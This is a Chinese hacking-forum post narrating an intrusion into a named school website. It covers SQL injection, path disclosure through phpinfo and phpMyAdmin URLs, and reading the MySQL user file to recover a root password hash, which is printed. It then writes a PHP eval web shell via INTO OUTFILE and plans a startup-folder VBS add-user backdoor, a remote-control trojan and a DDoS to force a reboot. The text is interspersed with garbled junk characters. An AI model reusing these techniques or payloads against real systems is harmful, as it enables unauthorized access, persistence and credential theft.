第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏( x9 K! C4 B. @
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
* ^0 S( j) Q6 C, A9 D
6 l% M7 S6 w' S( a6 }7 b% N/ O
0 ] v% b6 ~' |% G0 U& R r: g
+ r5 x; L- P% x6 C3 v- N常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
3 m/ A7 y) F. m
9 T$ ^7 U$ z" M' J9 _; q那么想可以直接写入shell ,getshell有几个条件:
7 B N0 p# Z& x! W: y* ]& Z$ S: u0 Q1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
0 v. \% V, [& \6 R3 H% m+ `" e+ s- b( B
试着爆绝对路径: 1 F1 `5 G- } w
1./phpMyAdmin/index.php?lang[]=1 1 \$ r- m& z" c- J; X7 n
2./phpMyAdmin/phpinfo.php
+ m- K. ~' t) ~8 d2 v! r$ v" e3./load_file() % ?% j/ {+ K1 f2 C8 \+ ~8 q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php
* f0 } B# Q, @' C# H5./phpmyadmin/libraries/select_lang.lib.php
/ w5 T7 v0 D1 n# y6./phpmyadmin/libraries/lect_lang.lib.php 9 u2 | p+ ]+ C* F Q. Z& Q2 J
7./phpmyadmin/libraries/mcrypt.lib.php ( o* b) a) ]# F. h+ O2 C/ C
8./phpmyadmin/libraries/export/xls.php - b0 o$ f( W7 r! u: |% o
0 ~% `* i7 r5 b4 V! M: x
均不行...........................
& O7 u0 k6 q6 R8 `
" v+ C S6 `, p2 A2 }1 Q6 Y% U9 a3 E御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
! S! m, v9 N" \7 z% `
" x1 g( S) O; P" `; a权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
! h, E {1 f7 n' A' V# }+ L! p6 U
. Z4 m% E! `2 v* P6 w9 @4 s默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 ) T* N$ t& Q' m. U, k, J
! X* h: {+ r3 |* r+ i; y
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 0 [, H5 r, r3 h' q# C( Z6 Y) A
* v' x! c$ b4 ]5 D( h
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
. M/ U% u1 M) N" M8 D0 z$ E* l; A+ i- l4 L0 c
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini % C v: v) }' w6 ^
. e- ?7 s: F, `% K/ Y自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
+ l. F+ e6 ^0 T' [* f, B7 x( h) e1 S+ s: G
成功读到root密码:
8 P( |0 |5 N; E% H! }
/ ~1 d+ A7 k- }6 d% A F; D( q17---- r(0072) * \" c" }. s. @5 [7 T2 W1 }0 R% I
18---- o(006f)
, H1 ~; f$ d9 c+ g4 w& M) ]19---- o(006f)
+ o+ m! p9 |! T) g, s, o5 H20---- t(0074) % e6 \. e. `# I9 V$ U
21---- *(002a) ; t7 [$ ~) e. @* c9 ^- u
22---- 8(0038) $ j8 p+ x$ O! O5 S g6 R
23---- 2(0032) 6 Y. y b' u! k, g( |
24---- E(0045)
7 n* a. j. A r9 _2 E7 g; I* x25---- 1(0031)
# s2 F$ U2 c& N% |! B- M3 C26---- C(0043) 7 S4 M8 R7 w$ S3 E6 g* M* ]
27---- 5(0035) , a1 o4 L( X8 K s+ p. ^8 n
28---- 8(0038)
( R8 _& D4 F a# N0 w29---- 2(0032) % T0 @& I& o4 S- g: K& J8 T' u
30---- 8(0038)
& t$ D( V6 W6 b; I( w31---- A(0041) 9 Z+ q* |; a+ P0 Y" L
32---- 9(0039) $ y$ h. N$ q+ g' [
33---- B(0042) $ U9 S! |- V" X
34---- 5(0035) 7 O7 J( v0 \4 w; b6 N8 u
35---- 4(0034) 7 l/ [8 C, q! @: o% G1 v
36---- 8(0038) ( x5 i U* U }
37---- 6(0036) % G8 N2 s. d+ T# p& Z
38---- 4(0034)
w) x- K5 w5 c: |39---- 9(0039) . }3 u$ q2 P; B# ]
40---- 1(0031) & Q3 p+ g5 p: `) H# u
41---- 1(0031) ! V* {( p1 ]% O
42---- 5(0035) 3 v' n' G0 J/ ^1 h, `( d7 v
43---- 3(0033) 4 S# J0 t+ P( S
44---- 5(0035) % k# |! E) W2 X! N9 P% [4 W$ Z5 J0 c# Y1 P
45---- 9(0039)
6 L! P# N$ B" g9 v, L; N$ Q46---- 8(0038)
% q5 I% [/ w8 V* @2 n7 R: X5 a47---- F(0046) $ c3 \' k! @$ `( G1 u
48---- F(0046) : B1 D9 U4 f- o, G I
49---- 4(0034) % v& H2 a9 x( C! g/ F' K
50---- F(0046) ; a0 |4 t2 Y- f6 f i, _9 ~
51---- 0(0030)
2 S P* I& o# l6 G7 P7 `& R( W! ^52---- 3(0033) + A" M4 u" ^! i' T5 G4 ?
53---- 2(0032) 1 w0 e" Z" U$ `2 N h$ ]7 b' E
54---- A(0041) ' Q8 m/ D/ \. J
55---- 4(0034) , }& d% K' _% r7 g! O3 y4 h
56---- A(0041)
& L1 w; I) \3 X- s- f2 c9 @1 \57---- B(0042) 2 Q6 Z, q+ H h/ N4 O; s- `
58---- *(0044) 8 [7 n( `7 g6 ? U; r8 a
59---- *(0035) * P7 ^% X* j! C% F$ S! j5 U y- `6 W
60---- *(0041) " B3 U* r e( T1 G
61---- *0032) 5 k; T- c0 m+ O9 z/ d% r9 e# n/ l
- I5 [% e5 V }+ a1 o解密后成功登陆phpmyamin 2 B) b3 w4 r* T3 b# J: V+ n% d
9 ` H2 U! S! ~4 C
7 G$ v$ M( M4 C* C
: i1 P1 a* u' m) M4 y0 |7 ]3 T9 i) Q1 f6 A/ h
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
. L" R8 U/ x' [/ }9 W
7 o, V K8 H3 d) V4 N; z成功执行,拿下shell,菜刀连接: 2 a9 P1 E- N% U4 E; k: T+ t% }6 _- y4 Y
0 e3 I B& E; | s服务器不支持asp,aspx,php提权无果................... 8 M: B: h0 w- w# h' k
/ Q4 T; d1 I5 d" V$ T但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
3 g( ]" u' L& X* I$ W服务器上已经有个隐藏帐号了 9 x- y1 u# _6 D2 d
别名 administrators
8 Q' G% @8 J; G注释 管理员对计算机/域有不受限制的完全访问权
& X+ r: F, p% B8 F E; ?成员 ) k3 |- C: ~' u
-------------------------------------------------------------------------------
% x2 n1 I: V, i# P8 m& i. fadmin
% E7 b; o, f l1 wAdministrator C' d% I4 a5 D& n( c
slipper$, T9 a" k3 Y+ J2 f
sqluser1 Z% C9 W! U+ F" h- r! D0 f
命令成功完成。
7 o, W+ a: s% k: t. B# ?3 e. }) u
* q2 y% s [& M; n S" ?服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
# y% m, K1 C9 I* a: k+ e# ?' m0 a* M( i J
ddos服务器重启,不然就只能坐等服务器重启了...............................
) a: O. b9 _6 A+ n! y7 P/ m* {5 v
' H. x3 @1 _: F2 D% o & X9 ? V2 X2 ^0 ]0 X8 }
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
